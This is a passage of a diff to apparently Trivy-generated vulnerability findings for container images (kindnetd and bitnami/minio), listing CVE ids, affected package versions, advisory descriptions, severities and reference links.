"2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-6096", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "2.36.1-8+deb11u1", + "packageName": "mount", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-6096", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", - "https://security.gentoo.org/glsa/202101-20", - "https://sourceware.org/bugzilla/attachment.cgi?id=12334", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", - "https://ubuntu.com/security/notices/USN-4954-1", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://www.cve.org/CVERecord?id=CVE-2020-6096", - "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", ], }, "category": "Vulnerability", - "description": "An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU glibc implementation) with a negative value for the 'num' parameter results in a signed comparison vulnerability. If an attacker underflows the 'num' parameter to memcpy(), this vulnerability could lead to undefined behavior such as writing to out-of-bounds memory and potentially remote code execution. Furthermore, this memcpy() implementation allows for program execution to continue in scenarios where a segmentation fault or crash should have occurred. The dangers occur in that subsequent execution and iterations of this code will be executed with this corrupted data.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: signed comparison vulnerability in the ARMv7 memcpy function", + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-6096", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-6096", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "6.2+20201114-2+deb11u1", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-29458", + "installedVersion": "6.2+20201114-2", + "packageName": "ncurses-base", + "references": [ + "http://seclists.org/fulldisclosure/2022/Oct/41", + "https://access.redhat.com/security/cve/CVE-2022-29458", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + "https://invisible-island.net/ncurses/NEWS.html#t20220416", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "https://support.apple.com/kb/HT213488", + "https://ubuntu.com/security/notices/USN-5477-1", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29458", + ], + }, + "category": "Vulnerability", + "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "ncurses: segfaulting OOB read", + "references": [ { "type": "URL", - "value": "https://sourceware.org/bugzilla/attachment.cgi?id=12334", + "value": "https://avd.aquasec.com/nvd/cve-2022-29458", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", + "value": "http://seclists.org/fulldisclosure/2022/Oct/41", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "value": "https://access.redhat.com/security/cve/CVE-2022-29458", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4954-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-6096", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", }, { "type": "URL", - "value": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3326", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/01/28/2", - "https://access.redhat.com/security/cve/CVE-2021-3326", - "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", - "https://linux.oracle.com/cve/CVE-2021-3326.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210304-0007/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", - "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5699-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3326", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - ], - }, - "category": "Vulnerability", - "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: Assertion failure in ISO-2022-JP-3 gconv module related to combining characters", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3326", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/01/28/2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3326", + "value": "https://support.apple.com/kb/HT213488", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", + "value": "https://ubuntu.com/security/notices/USN-5477-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3326.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29491", + "installedVersion": "6.2+20201114-2", + "packageName": "ncurses-base", + "references": [ + "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "https://access.redhat.com/security/cve/CVE-2023-29491", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "https://security.netapp.com/advisory/ntap-20230517-0009/", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "https://www.openwall.com/lists/oss-security/2023/04/13/4", + ], + }, + "category": "Vulnerability", + "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Local users can trigger security-relevant memory corruption via malformed data", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://avd.aquasec.com/nvd/cve-2023-29491", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210304-0007/", + "value": "https://access.redhat.com/security/cve/CVE-2023-29491", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", }, { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", + "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", }, { "type": "URL", - "value": "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5699-1", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3326", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3999", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4450", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - "https://access.redhat.com/security/cve/CVE-2021-3999", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", - "https://linux.oracle.com/cve/CVE-2021-3999.html", - "https://linux.oracle.com/errata/ELSA-2022-9234.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", - "https://security-tracker.debian.org/tracker/CVE-2021-3999", - "https://security.netapp.com/advisory/ntap-20221104-0001/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2021-3999", - "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4450", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", + "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", + "https://linux.oracle.com/cve/CVE-2022-4450.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4450", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", + "name": "double free after calling PEM_read_bio_ex", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3999", + "value": "https://avd.aquasec.com/nvd/cve-2022-4450", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3999", + "value": "https://access.redhat.com/security/cve/CVE-2022-4450", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2016-10228", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "http://openwall.com/lists/oss-security/2017/03/01/10", - "http://www.securityfocus.com/bid/96525", - "https://access.redhat.com/security/cve/CVE-2016-10228", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", - "https://linux.oracle.com/cve/CVE-2016-10228.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", - "https://security.gentoo.org/glsa/202101-20", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", - "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2016-10228", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - ], - }, - "category": "Vulnerability", - "description": "The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE) along with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: iconv program can hang when invoked with the -c option", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2016-10228", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "http://openwall.com/lists/oss-security/2017/03/01/10", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/96525", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2016-10228", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2016-10228.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2016-10228", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-25013", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-25013", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", - "https://linux.oracle.com/cve/CVE-2019-25013.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210205-0004/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", - "https://ubuntu.com/security/notices/USN-5310-1", - 